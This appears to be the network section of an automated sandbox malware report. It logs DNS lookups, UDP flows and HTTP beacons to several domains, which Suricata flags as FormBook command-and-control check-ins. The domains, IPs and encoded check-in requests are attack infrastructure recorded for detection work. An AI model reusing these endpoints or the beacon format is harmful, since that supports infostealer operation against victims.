Network Analysis
| Name | Response | Post-Analysis Lookup |
|---|---|---|
| www.funwarsztat.com | 185.253.212.22 | |
| www.03ss.vip |
CNAME
63a4ffed.mycdn.online
|
|
| www.alcmcyu.com | 45.196.82.124 | |
| www.sarthaksrishticreation.com | 119.18.49.69 | |
| www.dryadai.com | 3.64.163.50 |
- UDP Requests
-
-
192.168.56.103:50800 164.124.101.2:53
-
192.168.56.103:52760 164.124.101.2:53
-
192.168.56.103:53673 164.124.101.2:53
-
192.168.56.103:62576 164.124.101.2:53
-
192.168.56.103:64894 164.124.101.2:53
-
192.168.56.103:137 192.168.56.101:137
-
192.168.56.103:137 192.168.56.255:137
-
192.168.56.103:138 192.168.56.255:138
-
192.168.56.103:49154 239.255.255.250:1900
-
8.8.8.8:53 192.168.56.103:53673
-
GET
200
http://www.alcmcyu.com/sy22/?x4rXkXCP=HJcnt9shjuyeuMnZ8QWG9PRz+SaAKZLp97hCM6mnnpBn/SSeG+yBNrNPh/yBSnbTf5L809Cn&CdTHh=Cj6t
REQUEST
RESPONSE
BODY
GET /sy22/?x4rXkXCP=HJcnt9shjuyeuMnZ8QWG9PRz+SaAKZLp97hCM6mnnpBn/SSeG+yBNrNPh/yBSnbTf5L809Cn&CdTHh=Cj6t HTTP/1.1
Host: www.alcmcyu.com
Connection: close
HTTP/1.1 200 OK
Server: nginx
Date: Sat, 30 Sep 2023 04:45:18 GMT
Content-Type: text/html
Content-Length: 2453
Connection: close
Vary: Accept-Encoding
GET
403
http://www.funwarsztat.com/sy22/?x4rXkXCP=CDtdPYcE26NN/Lh6rpX6TL7KDn7jwiiUYTi0Hy7RVwWXAZEPuz0NUNjW/3QemKZGBVrgMz80&CdTHh=Cj6t
REQUEST
RESPONSE
BODY
GET /sy22/?x4rXkXCP=CDtdPYcE26NN/Lh6rpX6TL7KDn7jwiiUYTi0Hy7RVwWXAZEPuz0NUNjW/3QemKZGBVrgMz80&CdTHh=Cj6t HTTP/1.1
Host: www.funwarsztat.com
Connection: close
HTTP/1.1 403 Forbidden
Server: nginx
Date: Sat, 30 Sep 2023 04:45:38 GMT
Content-Type: text/html
Content-Length: 146
Connection: close
GET
301
http://www.sarthaksrishticreation.com/sy22/?x4rXkXCP=++s7hqRnDFs/g5YbNhmDQGydnZIcmR65wuKS6+wpOQxc/+r74UhYv08VjUB0PTEo7NuOximl&CdTHh=Cj6t
REQUEST
RESPONSE
BODY
GET /sy22/?x4rXkXCP=++s7hqRnDFs/g5YbNhmDQGydnZIcmR65wuKS6+wpOQxc/+r74UhYv08VjUB0PTEo7NuOximl&CdTHh=Cj6t HTTP/1.1
Host: www.sarthaksrishticreation.com
Connection: close
HTTP/1.1 301 Moved Permanently
Date: Sat, 30 Sep 2023 04:45:59 GMT
Server: Apache
Location: https://www.sarthaksrishticreation.com/sy22/?x4rXkXCP=++s7hqRnDFs/g5YbNhmDQGydnZIcmR65wuKS6+wpOQxc/+r74UhYv08VjUB0PTEo7NuOximl&CdTHh=Cj6t
Content-Length: 349
Connection: close
Content-Type: text/html; charset=iso-8859-1
GET
410
http://www.dryadai.com/sy22/?x4rXkXCP=T4nku/U6fUoiT4V699ActYtDMjyavvK02m+fxEC1q0+DSMs1WUMajGSqA4Kum2DGC179VQvP&CdTHh=Cj6t
REQUEST
RESPONSE
BODY
GET /sy22/?x4rXkXCP=T4nku/U6fUoiT4V699ActYtDMjyavvK02m+fxEC1q0+DSMs1WUMajGSqA4Kum2DGC179VQvP&CdTHh=Cj6t HTTP/1.1
Host: www.dryadai.com
Connection: close
HTTP/1.1 410 Gone
Server: openresty
Date: Sat, 30 Sep 2023 04:46:39 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
ICMP traffic
No ICMP traffic performed.
IRC traffic
No IRC requests performed.
Suricata Alerts
| Flow | SID | Signature | Category |
|---|---|---|---|
| TCP 192.168.56.103:49167 -> 45.196.82.124:80 | 2031412 | ET MALWARE FormBook CnC Checkin (GET) | Malware Command and Control Activity Detected |
| TCP 192.168.56.103:49169 -> 119.18.49.69:80 | 2031412 | ET MALWARE FormBook CnC Checkin (GET) | Malware Command and Control Activity Detected |
| TCP 192.168.56.103:49168 -> 185.253.212.22:80 | 2031412 | ET MALWARE FormBook CnC Checkin (GET) | Malware Command and Control Activity Detected |
| TCP 192.168.56.103:49170 -> 3.64.163.50:80 | 2031412 | ET MALWARE FormBook CnC Checkin (GET) | Malware Command and Control Activity Detected |
Suricata TLS
No Suricata TLS
Snort Alerts
No Snort Alerts